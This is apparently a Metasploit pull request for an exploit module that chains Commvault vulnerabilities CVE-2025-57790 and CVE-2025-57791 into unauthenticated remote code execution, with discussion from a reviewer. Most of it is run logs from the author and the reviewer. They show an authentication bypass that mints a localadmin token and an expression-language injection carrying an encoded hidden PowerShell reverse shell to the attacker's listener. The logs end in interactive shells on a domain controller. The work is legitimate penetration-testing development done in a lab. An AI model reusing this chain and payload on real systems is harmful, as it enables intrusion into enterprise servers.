Exploit Module for CVE-2025-57790/CVE-2025-57791 - Commvault Unauthenticated RCE

[remmons-r7]

This module exploits an unauthenticated remote code execution exploit chain for Commvault, tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated access to the 'localadmin' account, which then facilitates code execution via expression language injection. CVE-2025-57788 is also leveraged to leak the target host name, which is necessary knowledge to exploit the remote code execution chain. This module executes in the context of 'NETWORK SERVICE' on Windows.

Verification

1. Start msfconsole
2. use exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791
3. set RHOSTS <TARGET_IP_ADDRESS>
4. set RPORT <TARGET_PORT>
5. run

Example usage

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > show options 

Module options (exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h, http, sapni, socks4
   RHOSTS     192.168.154.173  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             yes       Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Commvault
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.154.139  yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > set VERBOSE true
VERBOSE => true
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > check
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 572131A8-3182-4423-8850-4A62D6CA2178
[*] Attempting to login as PublicSharingUser
[+] Authenticated as PublicSharingUser, got token: QSDK 34bf02a14954ba56882d9614fb3dfb8d81f8c9f6ae1b180cf7008674f44701dd6e12073182cd57fe736b0dd023e8985feba3ad28fc0d509c6364fe553ddc09ffc05beeeebf0b041baed00d5927ada3d14902085942e84952538dfcee2e69539c76f6e388d8b7ad5c672eab2383f6fbe7760a3061d4b7515ff5320b6169935d239cf9322fa09e0107f0ad5750cf7dfa9eec22e5ff5e46e2e6706ba765cf8b6e059d03e1fd6a86ef6ba50ba229f6217b64a35815a82b2c63347c913d5e66945273ed4d3fcc73dd0a03a119592168550be06
[+] 192.168.154.173:443 - The target is vulnerable. Successfully authenticated as PublicSharingUser
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > run
[*] Started reverse TCP handler on 192.168.154.139:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 572131A8-3182-4423-8850-4A62D6CA2178
[*] Attempting PublicServiceUser login using: 572131A8-3182-4423-8850-4A62D6CA2178
[+] Authenticated as PublicSharingUser, got token: QSDK 3d68d1d2b797e29d96dced010003dc2b8b30c298d87bd24754009afe40bb38921cf7f2e800a4cc43b5c3bda15b06e1a563225a4e08fb4814847ea8f601e9ac6a2405082bf37bcc3d87f493800359c0e0d340b3b12f464b6f1a12756ac218b3e6dc34ebe589b9aca40351512a50d421c9901ebc3952db9c798a3a2d17b94642a7c47861eadd1737666aea2ef49ae62d70efe080f1d6e879bce0dd3dd56cb4f233867a3fa314f192ceb380a5bacefd715ba4e90c4e0a53461ba041c68f183ba771640151f24a508e4ceca6387cec475dd84
[*] Attempting to query authenticated API endpoint to get host name and OS
[+] Got target host name: DC01
[+] Got target host OS: Windows
[*] Attempting to mint a localadmin token using hostname: DC01
[+] Successfully bypassed authentication
[*] Admin token: QSDK 3ec7146da31ce17e7698106e52c813be5d188db27103adf8595059b31935fbe6c1750ca468c2bc02cf514093cb4196f56fd5197bd84c5ca966b803d3b556a2b69be08dae5d4ac3bc7a4e967e2cf94263bb6ce11f4eb02b3f4b70943de18cdd7f21e119493ba98c87bb396f5484f9cd3b08ccbfef3a06b9dc38e20cb7904d4bdd59ea09f6d084c56d2269d0a6a8a4ad96b7c33a2ad18fe1978839494db8b6d6c87205fadab0466cafee879299154c1a40f573d026762c1084c8c65cba0a56efccf3dfe38adc2fb38e09b5c8cfbc22527d13ce872d80b8e3984f89b6e2efd3972384b77d23706264c33c63428ddcea4b9eea8054153c39ab867
[*] Extracted localadmin user ID number: 4
[*] Got JSON response, searching for installation path disclosures
[+] Leaked the installation path: C:\Program Files\Commvault\ContentStore
[*] Uploading XML file: <App_GetUserPropertiesRequest level="30">
	<user userName="DC01_localadmin__" /></App_GetUserPropertiesRequest>
[*] Updating user description: <App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity><userId>4</userId></userEntity><description>${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('powershell -w hidden -nop -e YwBtAGQALgBlAHgAZQAgAC8AYwAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBuAG8AbgBpACAALQBlAHAAIABiAHkAcABhAHMAcwAgACIAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAUABPAHUAdQAyAGcAQwBBADUAVgBWAFgAVwAvAGIATgBoAFIAOQA5ADYAKwA0AE0ATgBSAEcAUQBtAHoAQwA5AHIAcABoAEQAWgBDAGkAbgBwAG8ATwBBAGIATABXAHEATABMAGwAdwBUAEEAUQBtAHIAcQBPAHQAZABDAGsAUwAxAHsAMgB9AHgAagBjAFQALwBmAGEAUgB7ADEAfQBmAFQAaABPAHMASgBZAFAAdABzAGgANwBlAFgAaAA0ADcAaQBHADUAeQBBAFUAegBtAFIAVAB3AEoANQByACsARABjADQAWgB6ADEAQQBZADYARAB4ADIAdwBMAFoAZwB3ACsAQQBjAHYAdQBDAG0ALwAzAFgAKwAnACcAKwAnACcATAB6AEkARAAvAGUAdgBkAEcAcgAvAFEARgBkAHAAQgBRADIAeAArAFgATwBSAFgAeQBlAFIAdgBqAFoAOQB3AFEAWABOAHUAWQBvAFcAcABqAFcAUwBVAGEAdwBzAFIARwBKAFYAagBuAFQAVgBSAGMAcgBzAGoAegB6AEwAcwBlAEcAdQBrAHkAdQAzAHMATwA0AHUAewAyAH0ANABsAHAAdQBVAE4AbQBlAFoAUQBkAEYAZgB7ADEAfQBJAFYAWABZAFgAbAA5AHoAUQB4AHsAMgB9AGgATgAzAHMAeQBDAFcAcQB4AFUAVgBhAGUAOQB3AE4ATgBHAGMAUwBmAEYAcwA4AEoAUABjAEMAQwA1AHAAVwBvAHgARwBIAGwATgBKAGgAbABxAEQARgAyAEEAbAAwADUAeQBqAEkALwBnAHgAagB7ADIAfQBCAE0AeQBSAFkAUQBWAHMAdABBAEgANwA5AEQAZAA1ADYASgB0AEIAcwBWAHcAWABKAGUATQBaAGQAbgAyAHEAQgBBAFoAUwBkAFAAawA1ADMAOQBYAGgARwBuAFcAaQBMAFoAUABSAHAATgByAHQAbgA2AHkAbQBmAE0AMwB0AGwAMgBQAEoARgBvAFEANQBWAHgANgAvAHEAVgBpADYAZwB2ADAAWABrAHIAYgA4AHcAWQByAG8AMABGAEwATQAnACcAKwAnACcAcwBSAGwAbABUADIAcgA5AEYAVgArAEkAQgB7ADIAfQA0AHoASABqAEcAcgBwAFYAOABwAGUAWQB4AHgATwAvAFUASABmADQAZgBrAFMARwB2AC8AMQBPAGgAcgArACsASQAnACcAKwAnACcAOABOAGYAMwBuAGQANwBiAGkAJwAnACsAJwAnAGQAKwArAFUANABwAG8AVABZAHsAMgB9ADYAYwByAHgATABlAEcASgB0AFYAcABTAGoARgBtAGUARABjAE8AeQBRAGkAVgBCADUANQBhAHUATAAwAGkATABuAHQAWQA4AHEAYwBCAGUAWQBZAGcAcwBWADUAbgBaAGsAYQBSAHsAMgB9AEQAZgAzACcAJwArACcAJwA2AHYAVwBCAGgAYgBZAFcAOQA4AEQARwA0AHQAdQBoADcANgBGAE0ATgAwADQATQA1ADMAMwBBACcAJwArACcAJwBsAEQAYwBhAG8AVABMAGIASQBHAEQAWAA0AEQAKwBWAFoAUwBwADMAMwBZAHMAcgA1AG4ATABMADcAVwBSAFMAOQBRAEkAZQBNAGMANwBOADAAeABuAFcAVAB4AHYAcABWAGIAUQB7ADIAfQBSAGMAOQA3AHIARwBxADYASABvADYANABuADEATQBhAHIAaABXAG8AMgAyAGwAWgB5AE8AdAA4AFoAbgBNADUAbQBnAGYAdAAzAGwAaAB3AFEATQBoAHIAWQA5AHYAVABtAGMAYgBEADMAWQBxAE4ASQBxADMAQQA0AE4AYgBnADEAQgBBAFcAVABxAGYAUAA3ADIAZABrADQAaQBTADgAdgBJADEAZQBBAFAAMQB4AE8AMgBMADIAeAB4AHAAVQBiAEQAJwAnACsAJwAnAFIATgAzAHQASgBJAGwAYwBnADQAcQBGADgASgBtAGcANQBVAG4AMQA5AGEAOABYAFQAaQBGAEEATQBYACcAJwArACcAJwBEAG0AZQBzAEoAZAAvAFIAUAA3AFoAaQB0AFYAQgAxAGcAYwByAFgATwBUAFIATwA4AEYAYgBGAGMANwAxAFIAMgB0AHoAUQBRAHgAaABIADgAbABUAHsAMQB9AGwAdABWAHcAWQBpAHsAMgB9AFYAYQBTADEAVQBvAFMAbQBEAHMARgBuAE4ASgAnACcAKwAnACcARwBoAFIAYQA3AEEAZABNAHkAYQAyADQARgBkADYAVwBYAGcANQB5AFkAMgB1AEQAWQBiAE8AeAAzAHEARABYAGQATQBnAFYAaQAnACcAKwAnACcAagB1AHoAYgBQAHUAbwBPAHQAUgB0AEoAeAAwAFoANgAnACcAKwAnACcAZQBkAFUAbQBwADcATwA0AE0AcABDAE8AbABuADgAaABVAEIAcQBuAGoALwBQAHQAWgByADEAVwBhAG8ATAB5AHAAYQBXAGMAdwBrAHsAMgB9AG0AYQBnAHYAbgBDAGEAcgBvAGUAMQBhAGUASABCAFAAUgA2AFQAYQBiAFgAbQBsAFYAVQBqAFIAMAA2AFYANABrAFAAZgBZAHYAOQBpAHUAcgBiAGIAYQA2AGwAMgBqADcATgB1AFcAMgBpAHcAegBqAG0AewAxAH0AWQBaAEkAWAByAHkAawAxADgAUQA1AHEARwBwAGMAZAA2AE0ATwBoAEIAJwAnACsAJwAnAGMATQBBACsAZwByADUAQQBHAEIAeABKAGUAdQBIADAAdwAvAFQAYQBhAHYAbgBhAGsAKwBIAFAAcQBVAHMAaABoAGMAWQBYAFgAdgBNAEcAeABaADQAMgA2AHEAaQAwADAAUAB4ADEAVQBlAHkAdQB7ADEAfQBoAFcAQwBMAEgAcABXAFQAWABzADQAWABUAEcAUAA5AGcAMwA5ADYAdQBvAHIAdwBVAGMAZgAzAGcANwBoAEMAYgA3AG0AcABsACsAaQBnAGoAZgBQAEEAZABRAEkAQwBrAHsAMQB9AHEANABGAE0ANABtAFMAUgB3AFkAdgA4AEwALwBhADgAawB7ADIAfQB6AHcAYwBrAFEAawAxAFMAeABmADkAQQBDAGMATgB5AE4AWQBSAEMAVgBBAHAAcQBhAGEARAAyAGMARgBpAEwAZABaAEYAbgBEAEMATwBWAEkAWABSAFMAdwB6AE8AMgB4ADEANwAxAEwAYQBkAFkAdwBQAC8AawBIADgAYgBtAFAAOQAxAGIATgB1AHcAUgAzADYAdAA1AG4AegBtAHUAVgA3AFcAcgA2AEcALwBlAFAAegBkAEgAbgBPAHAAMABlACsAbgBPAEkANwBWAEcAOQBVACcAJwArACcAJwAyAFQAUABOAHcASgBVAGEAdQBxADkAZgB7ADIAfQAvADEAcABuADEAZwA5ADkAWABUAHYALwBZAHYAMABIAGQAVwBxADkAewAyAH0AcQA0AEkAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBFACcAJwAsACcAJwBLACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACIAJwA=').getInputStream()).useDelimiter('%5C%5CA').next()}</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>
[*] Powershell session session 1 opened (192.168.154.139:4444 -> 192.168.154.173:50327) at 2025-09-05 22:51:42 -0500
^C
[-] run: Interrupted
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > sessions -i 1
[*] Starting interaction with 1...

PS C:\Program Files\Commvault\ContentStore\Apache\bin> whoami
nt authority\network service

I will share a packet capture of the exploit running successfully with the Metasploit team. Thank you!

[bwatters-r7]

@remmons-r7 did you mean to open this as a draft PR?

[jheysel-r7]

Awesome work @remmons-r7! Just a couple minor comments.

Testing

CommVault 11.36.49 running on a Windows 2019 Domain Controller

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > rexploit 
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 0B7A7F72-D613-4175-B199-A4806D17606A
[*] Attempting to login as PublicSharingUser
[+] Authenticated as PublicSharingUser, got token: QSDK 3968ad31e42d03a9fbe1cee06c1ff92f87718343c04d7fe601cb9ce8787c1ee6566eb70e1226455619bd79d7dc7452fba352f5208401a210f5bd4e3cb235eff265ef469f7be413e0812d776724b83751f08950c2f1e064286f7be0d6542003a3dbf5883d0750f474f53284e135510e0ae939f82be4bb5fd4ea73d086cd773f9eb37e03e372ceddc37b9673e29bbbd30ef43ef2e51826d92105a4618918325dd3fc8657078febc62c4ec386e59a4218e89470a088b231e37b2f8b04d98a676003385689504c853f3fd076e1739a8d7afb05c8b25ef9fa250d58e39eb5db069fbfc
[+] The target is vulnerable. Successfully authenticated as PublicSharingUser
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 0B7A7F72-D613-4175-B199-A4806D17606A
[*] Attempting PublicServiceUser login using: 0B7A7F72-D613-4175-B199-A4806D17606A
[+] Authenticated as PublicSharingUser, got token: QSDK 3901f9b43d5b2c92594089b546dc310b86b14a4a84323b55b108c5f24ee84545ff9204cb7ca9b415139eebd438a638cc94ec2b4f5d1c876a1601fcf2956b1b9b413d189e809f58e0e7c65a26df4be9550b96bac13be1c5b10cd98208e390af91cb10dcfc56b967a8bdfd67a6b470826ca72474e8e651ecaba0a58ab49c1bf1137fea9bd5750294e2a00c5b01d8b46ccb7a7f480dcab159455323e9b92e5b3a6a9c32522bfa6c8e996be64df7551053875a04e0b4a548afa894f91a5e1089bc13f010dc83d85f0b9a6cd5261d37083266e743479b7f2928843fdbcccb16f79e090
[*] Attempting to query authenticated API endpoint to get host name and OS
[+] Got target host name: dc2
[+] Got target host OS: Windows
[*] Attempting to mint a localadmin token using hostname: dc2
[+] Successfully bypassed authentication
[*] Admin token: QSDK 35a671e08b691eb9397bf67533d04f194a7e973f8f481adfc9a15583872d9e55893ea3c3a15158c3abfe5997d6303421feb5ac2d178a503ce2cb5e6b19f3aec3d89053502ac899021305eea1db987a8aab0e38923a9e8b9c61dee4c6323ab2da782867ad1a6350ecaf1be19b66da196e2661644472617a47344394345e74acbada3bd9f346b599dbb4adbd01db62c226dffacb65054302861afa2772ab4c1cca210ae11d28ae6211e14df54df8d4d2102a72ac8b0c1be62a5228ca7fee234359fd034e9209fd0ee9fb0cac59fc76d7fac13cdea218c090de2511acccf634b43713b7884f3f64a82fbfd2315e1b31c6d8d9bd63f341d3d6f27
[*] Extracted localadmin user ID number: 4
[*] Got JSON response, searching for installation path disclosures
[+] Leaked the installation path: C:\Program Files\Commvault\ContentStore
[*] Uploading XML file: <App_GetUserPropertiesRequest level="30">
        <user userName="dc2_localadmin__" /></App_GetUserPropertiesRequest>
[*] Updating user description: <App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity><userId>4</userId></userEntity><description>${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('powershell -w hidden -nop -e YwBtAGQALgBlAHgAZQAgAC8AYwAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBuAG8AbgBpACAALQBlAHAAIABiAHkAcABhAHMAcwAgACIAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARwBGAEQAdwAyAGcAQwBBADUAVgBWAFgAVwA4AGEATwBSAFIAOQA1ADEAZABjAG8AZQBsAG0AUgBnAEUATAAyAEYAVgBYAGoAWgBSAHEAMgBXAGwAYQBSAFUAcABiADEATQBsAHUASABoAHsAMAB9AFMAagBPAGMAUwBaAG0ATgBzAGEAbgBzAEMASwBPAEcALwAxADUANwB4AGYAewAwAH0AQQBTAGIAZQBzAEgARwBQAHQAZQBIAHgAKwBmAGUAMgB3AHYAYwBzAEYATQBKAGcAVgA4AFEAdABPAC8AdwBUAG4AagBHAFEAbwBEAG4AYwBjAE8AMgB7ADAAfQBaAHMARwBKAHoARABGADkAegAwAHYAOAA3AC8AUQAyAGEAZwBmADcAMQBiADQAeABlADYAUQBqAHQAbwBpAE0AMgBQAGkALwB3AHEAbQBmAHkAagA4AFEATQB1AGEATQA1AE4AcgBEAEMAMQB7ADEAfQBZAHgAeQBiAFMAJwAnACsAJwAnAEUAQwBvADMASwBzAHMAeQBaAEsAYgBuAGYAewAxAH0AVwBZAFkAZABiADQAMQBVAHUAWgAxADkAWgAxAEYAUgBYAE0AcwBOAEsAdAB1AHoANwBLAEMASQBUADYAaQBpAHEANwBEADgAbgBpAFoARwBaAGUASgB1AEYAcwBSAHkAdABhAEkAaQA3AFIAMgBPAEoAcABvAHoASwBaADQATgBmAHAAQQBiAHcAUwBWAE4AaQA5AEgASQBZAHkAcgBKAFUARwB2AHcAQQBxAHgAewAxAH0AbQBuAE4AMAB7ADAAfQBQADgASwBJAHkAaABUAHMAZwBXAEUAMQBUAEwAUQB4ACsALwBRAG4AVwBjAGkANwBVAFoARgBzAEoAeABYAHoATwBXAFoATgBpAGgAUQAyAGMAbgBUAFoARwBlAC8AVgA4AFMAcABsAHsAMQB9AGgAMgBqADAAYQBUAGEANwBhACsAOABoAG0AegBQADIAdwA3AG4AewAxAH0AaQAwAG8AYwBxADQAZABmADMASwAnACcAKwAnACcAUgBkAFMAWAA2AEwAeQBWAE4AMgBZAE0AMQA4AFkAQwBsAHUAVQBJAFMAeQByADcAMQArAGcAcQBmAEUAQwBsADgAWgBoAHgARABkADAAcQArAFUAdgBNADQANABsAGYAJwAnACsAJwAnAHEARAB2ADgAYwAwAFMARwBiADgAbgB3ADMAVABzAHkALwBIADMAUQA3AGIAbQBOACsATgBVADcAcABZAEwAYQBLAEsAUQByAFIANwBkAEUASgA5AFoAcABTAFQARgBtAGEAVABZAEUAeQB3AEsAVgAvAEoAeABaAHUAcgA0AGUATABYAFoAYQA4ADYAUQBDAGUANABVAGcAcwBsAHgAbABaAHsAMQB9AGUAUwBLAGoAWAAwADYALwBlAEMAaABYAFUAVgA5AHMATABIADQATgBxAGkANwA2AEYAUABOAFUAdwBQADUAbgB6AEQAbABUAFEAWQBvAHoATABaAEkAbQBQAFUANABMACsAVQBaAHkAbAAxADEAbwBzAHAANQAzAFAASwA3AG0AZABSADkAQQBJAGQATQBzADcATgAwAHYAbgBXAFQAUgByAHIAMQA2AFEASgBSAE0ANQA1AHIAMgB1ADQASABvADYANgBuAHsAMQB9ADgAYgByAHQAYQBwADIAVwBkAGIAeQBPAGwAOABaADMAQQA2AG0AdwBYAHUAMwB4AGwAeQBRAE0AaABvAFkATgB2AFQAbQA4AGYAewAwAH0AMwBtACcAJwArACcAJwB1AE4ASQBxADMAQwA0AGQAVABnADEAaABBAFUAVABLAGIATwA3AFcAZABuADQAeQBTACsAdgBJAHkAYwAvAG4AKwA3AG4ATAB7ADAAfQA3AFkAMgAwAHIATgB4AG8AbQA3AG0AQQBsAFMAKwBRAGMAVgBDADYARQB6AFEAYQByAFQAcQA2AHQAZABiAHQAdwBDAGcARwBLAGgAegBQAFgARQArADcAZwBuADkAbwB4AFcANgBnADYAdwBPAFIAcQBuAFoAcwBtAGUAQwB0AGkAdQBkADYAcAA3AEcANQBwAEkASQB3AGoAKwBKAHcAeABKAGIAVgBjAEcASQBpAGwAVwB7ADEAfQB0AFYAQwBFAHAAZwAnACcAKwAnACcANwB7ADAAfQBaAHoAUwBSAG8AVQAnACcAKwAnACcAVwB1AHcASABUAE0AbQB0AHUAewAwAH0AWABlAGwARgA0AE8AYwBtAE4ATABnADIARwB6AHMAZAA2AGcAMQAzAFQASQBGAFkAbwA3AHMAMgB6AGIAcQBEAHIAUwBiAFMATQBkACsAZQBqAFgAVgBKAHEAZQB6AHUARABLAFEAagBwAFoALwBIAFYAQQBhAHAAJwAnACsAJwAnADYALwB6AHIAVwBhADkAVgBHAHEAQwA4ACcAJwArACcAJwBxAFcAbABuAE0ASgBDAHAAbQBvAHIANQBzAG0AcQA2AEgAdABXAG4AaAB3AFMAMABlAHsAMQB9ADIAbQAxADUAbwBWAFYASQAwAGQATwBsAGUASgBEADMAMgBMAC8AWQByAHEAMgAyADIAdQBwAGQAbwArAHoAYgBsAHQAJwAnACsAJwAnAG8AcwBNADQANQBoAEcARwBTAEYANgA4AHAATgBmAEUATwBhAGgAcQBYAEgAZQBqAEQAbwBRAFgARABBAFAAbwBLACsAUQB7ADAAfQBnAGMAUwBYAHIAaAA5AE0AUAAwADIAbQByADUAMgBvAFAAaABqADYAbABMAEkAWQBYAEcARgAxADcAJwAnACsAJwAnAHoAewAwAH0AcwBVAGUATgB1AHEAbwB0AE4ARAA4ACcAJwArACcAJwBiAFYASABzAHIAaAAnACcAKwAnACcASQBWAGcAaQB4ADYAVgB7ADEAfQAxADcATgBsADAAeABqAC8AWQBOAC8AZQByAGkASwA4AEYASAA3ADMAOABiAHcAaABOADgAegBVADIALwBSAEEAVgB2AG4AZwBPAG8ARQBSAFMAQwBWAE0AQwBuAGMARABKAEoANABNAFQAKwBGAC8AcABmAFMAVgBaADQATwBDAEkAVABhAHAAWQB1ACsAaAA1AE8ARwBwAEMAdABJAHgASwBnAFUAbABKAE4AewAwAH0ANwBPAEQAeABWAHEAcwBpAHoAaABoAEgASwB7ADEAfQBLAG8ANQBjAFkAbgBMAGMANwA5AHEAaAB0AE8AOABjAEcALwBpAG4ALwBOAGoARAAvADYAOQBpADIAWQBZAC8AOABXAHMAMwA1AHkASABPADkAcgBOADkAQwBmAC8ASAA0AHEAegAzAG0AVQBxAFAAZgBUADMARQBjAHEAeABlAHEAYgBaAGoAbQAyAFUAcQBNAFgARgBkAHYAbABmACsAMQB6ACcAJwArACcAJwBxAHkAZgArAGIAcAAyAC8AcgAzADYAQQBkAHYAZgBuAG4AKwBzAEMAQQBBAEEAJwAnACkALQBmACcAJwBCACcAJwAsACcAJwBrACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACIAJwA=').getInputStream()).useDelimiter('%5C%5CA').next()}</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>
[*] Powershell session session 1 opened (172.16.199.130:4444 -> 172.16.199.200:63620) at 2025-09-11 14:47:22 -0700

^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] rexploit: Interrupted
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > sessions -l

Active sessions
===============

  Id  Name  Type                Information  Connection
  --  ----  ----                -----------  ----------
  1         powershell windows  DC2$ @ DC2   172.16.199.130:4444 -> 172.16.199.200:63620 (172.16.199.200)

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > sessions -i -1
[*] Starting interaction with 1...

PS C:\Program Files\Commvault\ContentStore\Apache\bin> whoami
nt authority\network service
PS C:\Program Files\Commvault\ContentStore\Apache\bin> systeminfo

Host Name:                 DC2
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00000-00001-AA815
Original Install Date:     11/20/2023, 2:17:39 PM
System Boot Time:          9/11/2025, 1:54:25 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz
                           [02]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.24006586.B64.2406042151, 6/4/2024
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     16,383 MB
Available Physical Memory: 4,530 MB
Virtual Memory: Max Size:  18,815 MB
Virtual Memory: Available: 5,883 MB
Virtual Memory: In Use:    12,932 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    kerberos.issue
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB4486153
                           [02]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 172.16.199.200
                                 [02]: fe80::f929:8ca6:c03d:7842
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Program Files\Commvault\ContentStore\Apache\bin>